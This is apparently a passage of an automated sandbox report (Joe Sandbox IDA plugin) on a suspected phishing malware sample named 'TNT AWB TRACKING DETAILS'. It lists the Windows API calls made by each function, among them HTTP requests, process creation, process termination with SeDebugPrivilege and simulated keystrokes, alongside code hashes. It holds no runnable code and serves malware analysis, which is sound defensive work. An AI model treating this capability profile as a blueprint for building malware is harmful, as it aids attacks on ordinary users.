                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F31ABE
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F31AD3
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F31AE0
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F31B10
                                                    • InternetCloseHandle.WININET(00000000), ref: 00F31B57
                                                      • Part of subcall function 00F32483: GetLastError.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F32498
                                                      • Part of subcall function 00F32483: SetEvent.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F324AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 2603140658-3916222277
                                                    • Opcode ID: 4f77d20d7f7a10c6d5799b5a4065418b79ff3d3ec0c02125f4e5812bae510325
                                                    • Instruction ID: 5c9d1b4e72cfa0ca3916743797de7840dad21dc180a995bf58ead1d7293cce76
                                                    • Opcode Fuzzy Hash: 4f77d20d7f7a10c6d5799b5a4065418b79ff3d3ec0c02125f4e5812bae510325
                                                    • Instruction Fuzzy Hash: 4F4182B5901219BFEB118F50CC85FBBBBACFF49364F004126FD059A141E7789E44ABA0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F4F910), ref: 00F38D28
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F4F910), ref: 00F38D5C
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F38ED6
                                                    • SysFreeString.OLEAUT32(?), ref: 00F38F00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: a87163907f5b32927c9505036fd9b0f6ea8d28ccb4b25297f15eadaf43c28543
                                                    • Instruction ID: 56f765c5163849af42dea5ceedaad09bd9edcd868981618110520fcfd335123b
                                                    • Opcode Fuzzy Hash: a87163907f5b32927c9505036fd9b0f6ea8d28ccb4b25297f15eadaf43c28543
                                                    • Instruction Fuzzy Hash: F4F14B71A00209EFDF04DFA4C888EAEB7B9FF45364F108498F905AB251DB75AE46DB50
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F3F6B5
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F848
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F86C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F8AC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F8CE
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F3FA4A
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F3FA7C
                                                    • CloseHandle.KERNEL32(?), ref: 00F3FAAB
                                                    • CloseHandle.KERNEL32(?), ref: 00F3FB22
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                    • String ID:
                                                    • API String ID: 4090791747-0
                                                    • Opcode ID: 4fc6d487dfd204a4afde8fbc46f15d852bfaa65fb690e454568093c18ff11a1c
                                                    • Instruction ID: d90cf3c4321fbfad99b8e2b211ae22aee736103d2e7980f80e31475a356946a9
                                                    • Opcode Fuzzy Hash: 4fc6d487dfd204a4afde8fbc46f15d852bfaa65fb690e454568093c18ff11a1c
                                                    • Instruction Fuzzy Hash: B2E1A031A043419FCB14EF24C981B6ABBE1EF85364F14856DF8999B3A2CB31DC49DB52
                                                    APIs
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F23697,?), ref: 00F2468B
                                                      • Part of subcall function 00F2466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F23697,?), ref: 00F246A4
                                                      • Part of subcall function 00F24A31: GetFileAttributesW.KERNEL32(?,00F2370B), ref: 00F24A32
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00F24D40
                                                    • _wcscmp.LIBCMT ref: 00F24D5A
                                                    • MoveFileW.KERNEL32(?,?), ref: 00F24D75
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                    • String ID:
                                                    • API String ID: 793581249-0
                                                    • Opcode ID: 4de987bc212ec269c2658277472ed63cc4702e57ec6c17f8c2379ef0479d268e
                                                    • Instruction ID: ba006d13dd801ef8325a07d297aa86b3ecca9343dffbb5b514a9e900d2c97c54
                                                    • Opcode Fuzzy Hash: 4de987bc212ec269c2658277472ed63cc4702e57ec6c17f8c2379ef0479d268e
                                                    • Instruction Fuzzy Hash: 1F5183B24083949BC724DB60DC81EDBB7ECAF85350F40092EF689D3151EE75B188DB56
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F486FF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: 0b0b50b93506315ab27f628b7c2eb7cb30e371dfb220c6d5ffa444a7f4754025
                                                    • Instruction ID: 37914085b26bfd7eb84dd9058ae5af0dc7dad4f28db67a72a3163bcc7ade3eee
                                                    • Opcode Fuzzy Hash: 0b0b50b93506315ab27f628b7c2eb7cb30e371dfb220c6d5ffa444a7f4754025
                                                    • Instruction Fuzzy Hash: A5519231900248BFEB249B24CC85FAD7FA4AB057A0F604115FD15E62E1DF76AD82FB51
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EFC2F7
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EFC319
                                                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EFC331
                                                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EFC34F
                                                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EFC370
                                                    • DestroyIcon.USER32(00000000), ref: 00EFC37F
                                                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EFC39C
                                                    • DestroyIcon.USER32(?), ref: 00EFC3AB
                                                      • Part of subcall function 00F4A4AF: DeleteObject.GDI32(00000000), ref: 00F4A4E8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                    • String ID:
                                                    • API String ID: 2819616528-0
                                                    • Opcode ID: d4773e09583835220c0dac5c2b578738491bf34368b0b5a1e9dbeab2d26982c3
                                                    • Instruction ID: 6844e3b499b90533abc69d0947531f300b5b3dc22f145ca89bcb69021535e665
                                                    • Opcode Fuzzy Hash: d4773e09583835220c0dac5c2b578738491bf34368b0b5a1e9dbeab2d26982c3
                                                    • Instruction Fuzzy Hash: A551AB34600209AFDB24DF24CD41FAA7BF5EB18714F20552CFA06A72A0DB71AC91EB60
                                                    APIs
                                                      • Part of subcall function 00F1A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F1A84C
                                                      • Part of subcall function 00F1A82C: GetCurrentThreadId.KERNEL32 ref: 00F1A853
                                                      • Part of subcall function 00F1A82C: AttachThreadInput.USER32(00000000,?,00F19683,?,00000001), ref: 00F1A85A
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F1968E
                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F196AB
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F196AE
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F196B7
                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F196D5
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F196D8
                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F196E1
                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F196F8
                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F196FB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                    • String ID:
                                                    • API String ID: 2014098862-0
                                                    • Opcode ID: 95c5f5dfee6c733917d16e02d3a94df0853bbfd31c97530c5c840260409a209e
                                                    • Instruction ID: ea017ecbff680381b250b7135de6d930911e0c9cf4e8a51124938a7499a1bba5
                                                    • Opcode Fuzzy Hash: 95c5f5dfee6c733917d16e02d3a94df0853bbfd31c97530c5c840260409a209e
                                                    • Instruction Fuzzy Hash: 2711E575910218BEF6106F60DC49FAA3B5DDB4D760F110425F648AB0A1C9F25C50EAA4
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F1853C,00000B00,?,?), ref: 00F1892A
                                                    • HeapAlloc.KERNEL32(00000000,?,00F1853C,00000B00,?,?), ref: 00F18931
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F1853C,00000B00,?,?), ref: 00F18946
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00F1853C,00000B00,?,?), ref: 00F1894E
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F1853C,00000B00,?,?), ref: 00F18951
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F1853C,00000B00,?,?), ref: 00F18961
                                                    • GetCurrentProcess.KERNEL32(00F1853C,00000000,?,00F1853C,00000B00,?,?), ref: 00F18969
                                                    • DuplicateHandle.KERNEL32(00000000,?,00F1853C,00000B00,?,?), ref: 00F1896C
                                                    • CreateThread.KERNEL32(00000000,00000000,00F18992,00000000,00000000,00000000), ref: 00F18986
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 99eed51b36c62c4fd37c1244f502c5cde8f6a071dbb2def7de6e97d9f817400e
                                                    • Instruction ID: 9d1043ff9f32ec255d0cfb66a4f9505b124f6421ab1eb67474e2637e6f3e6f0e
                                                    • Opcode Fuzzy Hash: 99eed51b36c62c4fd37c1244f502c5cde8f6a071dbb2def7de6e97d9f817400e
                                                    • Instruction Fuzzy Hash: B501BF79640348FFE710ABA5DC4DF673BACEB99711F404421FA09DB291CA709804DB21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 0-572801152
                                                    • Opcode ID: 4bf75837a7976f002fbeda5f15ec49625490325c5e86fd68c3b03ea89f718b02
                                                    • Instruction ID: b8897db2bc01bf5aa46e6ecc9174b14e2da44d964403ad5c69561c61afd0e656
                                                    • Opcode Fuzzy Hash: 4bf75837a7976f002fbeda5f15ec49625490325c5e86fd68c3b03ea89f718b02
                                                    • Instruction Fuzzy Hash: 6CC1B371E0421A9FDF10DF98D885BAEB7F5FB48364F148429E905A7280E7F09D85DB60
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$_memset
                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                    • API String ID: 2862541840-625585964
                                                    • Opcode ID: cb2c4271af2cda27e368b9004b1c4fc054602c409f3bd357613c4bd2907490c0
                                                    • Instruction ID: e68198bd9176476e9dc7f8aab50205491e2240dcaa2b61258a4dfe3430fb6256
                                                    • Opcode Fuzzy Hash: cb2c4271af2cda27e368b9004b1c4fc054602c409f3bd357613c4bd2907490c0
                                                    • Instruction Fuzzy Hash: 67917B71E04219ABDF24DFA5C848FAFBBB8EF45720F108119F915AB290D7F09945DBA0
                                                    APIs
                                                      • Part of subcall function 00F1710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?,?,00F17455), ref: 00F17127
                                                      • Part of subcall function 00F1710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17142
                                                      • Part of subcall function 00F1710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?,?), ref: 00F17150
                                                      • Part of subcall function 00F1710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F17044,80070057,?), ref: 00F17160
                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F39806
                                                    • _memset.LIBCMT ref: 00F39813
                                                    • _memset.LIBCMT ref: 00F39956
                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F39982
                                                    • CoTaskMemFree.OLE32(?), ref: 00F3998D
                                                    Strings
                                                    • NULL Pointer assignment, xrefs: 00F399DB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: aa7e4290ca0daa5494fb894cd154db962ce0de511757bd59322c263eac1a0a17
                                                    • Instruction ID: 0bd4b36f490584de7e5013dd8dd95d16c28109967319d6e0e6c7c27b42359bd8
                                                    • Opcode Fuzzy Hash: aa7e4290ca0daa5494fb894cd154db962ce0de511757bd59322c263eac1a0a17
                                                    • Instruction Fuzzy Hash: 77915871D04229EBDB10DFA5DC40EDEBBB9AF48320F10415AF519A7281DBB1AA45DFA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F46E24
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00F46E38
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F46E52
                                                    • _wcscat.LIBCMT ref: 00F46EAD
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F46EC4
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F46EF2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 3a748da0295b7195e5faab3c0adf756974a3dac4c7a3dbaed6ccb7966c8cc89c
                                                    • Instruction ID: b2b1ac13693072a1c484f0b0237ebdb00e4f6215c7fddc664831d7c56892bab0
                                                    • Opcode Fuzzy Hash: 3a748da0295b7195e5faab3c0adf756974a3dac4c7a3dbaed6ccb7966c8cc89c
                                                    • Instruction Fuzzy Hash: 7E41C374A00348ABEB219F64CC85BEE7BF8EF09360F10442AF988E7291D6719D849B51
                                                    APIs
                                                      • Part of subcall function 00F23C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F23C7A
                                                      • Part of subcall function 00F23C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F23C88
                                                      • Part of subcall function 00F23C55: CloseHandle.KERNEL32(00000000), ref: 00F23D52
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F3E9A4
                                                    • GetLastError.KERNEL32 ref: 00F3E9B7
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F3E9E6
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F3EA63
                                                    • GetLastError.KERNEL32(00000000), ref: 00F3EA6E
                                                    • CloseHandle.KERNEL32(00000000), ref: 00F3EAA3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: fe9cdbf6ddc18e649a8694fb8d2ad9fa8484c2ddc24345068d511f1a8c4be1e4
                                                    • Instruction ID: a67e7656fdd37c9e5684717eb07065b170723f5c9d8b7ff4282a17aa8acd2f05
                                                    • Opcode Fuzzy Hash: fe9cdbf6ddc18e649a8694fb8d2ad9fa8484c2ddc24345068d511f1a8c4be1e4
                                                    • Instruction Fuzzy Hash: 9241CD726002019FDB14EF14CC95FAEB7E5AF41324F18841DF906AB3C2CB79A849EB91
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 00F23033
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: b40fc0c519984ba5f6fa14da7ef5183c019e684cfecf4e65455ef8402e4e4876
                                                    • Instruction ID: 92799216853efad3989e359531c70499354aaa06252c8dda4dde84e74f45d68a
                                                    • Opcode Fuzzy Hash: b40fc0c519984ba5f6fa14da7ef5183c019e684cfecf4e65455ef8402e4e4876
                                                    • Instruction Fuzzy Hash: 92115B727883AABEE715DA14EC42D6B779C9F19374B10002AFA04A6181DB789F0075BA
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F24312
                                                    • LoadStringW.USER32(00000000), ref: 00F24319
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F2432F
                                                    • LoadStringW.USER32(00000000), ref: 00F24336
                                                    • _wprintf.LIBCMT ref: 00F2435C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F2437A
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00F24357
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
